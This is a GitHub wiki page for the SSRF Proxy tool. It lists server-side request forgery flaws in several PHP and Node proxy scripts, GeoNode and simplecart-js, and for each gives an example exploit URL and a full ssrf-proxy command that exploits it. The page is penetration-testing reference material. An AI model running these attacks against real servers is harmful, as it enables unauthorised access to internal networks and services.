Skip to content

Vulnerable Software

Jump to bottom
Brendan Coles edited this page Oct 16, 2016 · 11 revisions

This section contains SSRF Proxy usage patterns for known SSRF vulnerabilities.

PHProxy

PHProxy (aka Poxy) is a web HTTP proxy written in PHP. The index.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://poxy.local/poxy/index.php?q=http://example.com/&hl=1e9

Usage

$ ssrf-proxy --guess-mime --guess-status
  --forward-cookies --body-to-uri --auth-to-uri
  --rules base64
  --url "http://poxy.local/poxy/index.php?q=xxURLxx&hl=1e9"
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • Specifying hl=1e9 in the URL specifies the URL should be base64 encoded, so the --rules base64 is required.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • --forward-cookies can be used as the proxy has a cookie jar.

Glype

Glype is a web-based proxy script written in PHP. The browse.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://glype.local/glype/browse.php?u=http://example.com/&f=norefer&b=4

Usage

$ ssrf-proxy --guess-mime --guess-status
  --forward-method --forward-headers --forward-body
  --cookie "s=<COOKIE>"
  --url "http://glype.local/glype/browse.php?u=xxURLxx&f=norefer&b=4"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body. Note that this will also forward the s cookie to the destination host.
  • The proxy makes use of anti-hotlinking functionality. A cookie is required to access the proxy and must be provided like so: --cookie "s=<COOKIE>"
  • --forward-cookies can be used as the proxy has a cookie jar.

php-simple-proxy

php-simple-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The ba-simple-proxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://php-simple-proxy.local/ba-simple-proxy.php?url=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --forward-method --forward-headers --forward-body
  --unescape
  --match 'contents":"(.*)"}\z'
  --url "http://php-simple-proxy.local/ba-simple-proxy.php?url=xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --match 'contents":"(.*)"}\z' should be used to extract the response from the JSON output.
  • --unescape should be used as the output is escaped.

php-json-proxy

php-json-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The JsonProxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://php-json-proxy.local/JsonProxy.php?url=http://example.com/?json

Usage

$ ssrf-proxy --guess-mime --guess-status
  --forward-method --forward-headers --forward-body
  --unescape
  --match 'contents":"(.*)"}\z'
  --url "http://php-json-proxy.local/JsonProxy.php?url=xxURLxx?.json"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --match 'contents":"(.*)"}\z' should be used to extract the response from the JSON output.
  • --unescape should be used as the output is escaped.

miniProxy

miniProxy is a web-based proxy script written in PHP. The miniProxy.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://miniProxy.local/miniProxy/miniProxy.php/http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --forward-method --forward-headers --forward-body
  --no-urlencode
  --match '\}\)\(\);</script>(.+)'
  --url "http://miniProxy.local/miniProxy/miniProxy.php/xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --forward-method, --forward-headers and --forward-body can be used as the proxy accepts and forwards the request method, headers and body.
  • --no-urlencode must be used as miniProxy does not support URL encoded request URLs.
  • --match '\}\)\(\);</script>(.+)' should be used to extract the response.

cors-proxy

cors-proxy is a simple proxy written in PHP which allows websites to bypass the same origin policy. The index.php file does not require authentication and allows users to perform SSRF.

Example SSRF

http://cors-proxy.local/cors-proxy/index.php?get=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --body-to-uri --cookies-to-uri --auth-to-uri
  --url "http://cors-proxy.local/cors-proxy/index.php?get=xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.

corsproxy

CORS Proxy is a simple proxy for nodejs which allows websites to bypass the same origin policy. By default, it binds to the local interface only.

Example SSRF

http://corsproxy.local:1337/example.com

Usage

$ ssrf-proxy --guess-mime --guess-status
  --body-to-uri --cookies-to-uri --auth-to-uri
  --rules noproto
  --no-urlencode
  --url "http://corsproxy.local:1337/xxURLxx"
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --no-urlencode must be used as corsproxy does not support URL encoded request URLs.
  • --rules noproto must be used as corsproxy does not accept a URL scheme in the destination URL.

GeoNode

GeoNode features a proxy which allows unauthenticated users to perform SSRF. Allowed hosts can be restricted using PROXY_ALLOWED_HOSTS, however this setting is ignored in debug mode (debug mode is enabled by default). All versions of GeoNode prior to commit 26c157e76cf9fa9d64a0763e9b353c64c2208a1f do not make use of host white listing.

Example SSRF

http://geonode.local/proxy/?url=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --body-to-uri --cookies-to-uri
  --url 'http://geonode.local/proxy/?url=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --auth-to-uri cannot be used as the proxy does not support authentication in URLs.

simplecart-js

simplecart-js is a JavaScript based shopping cart. Although the software is written using client-side JavaScript, it comes bundled with test cases written in PHP which are vulnerable to file disclosure and SSRF.

Example SSRF

http://simplecartjs.local/simplecart-js/test/inc/get-raw-javascript.php?file=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --body-to-uri --cookies-to-uri --auth-to-uri
  --url 'http://simplecartjs.local/simplecart-js/test/inc/get-raw-javascript.php?file=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • The default --match is sufficient as the response body contains only the HTTP response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.

Feed Proxy

Feed Proxy is a PHP based proxy for retrieving remote RSS feeds. It comes bundled with software (such as ExtJS) and is vulnerable to file disclosure and SSRF.

Example SSRF

http://feedproxy.local/extjs/examples/feed-viewer/feed-proxy.php?feed=http://example.com/

Usage

$ ssrf-proxy --guess-mime --guess-status
  --body-to-uri --cookies-to-uri --auth-to-uri
  --url 'http://feedproxy.local.local/extjs/examples/feed-viewer/feed-proxy.php?feed=xxURLxx'
  • --guess-status can be used as the proxy returns the response.
  • --auth-to-uri can be used as the proxy supports authentication in URLs.
  • The default --match is sufficient as the response body contains only the HTTP response.
Clone this wiki locally